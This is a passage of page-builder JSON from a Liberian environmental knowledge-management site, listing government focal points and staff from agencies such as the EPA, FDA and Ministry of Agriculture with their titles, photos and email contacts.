href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a 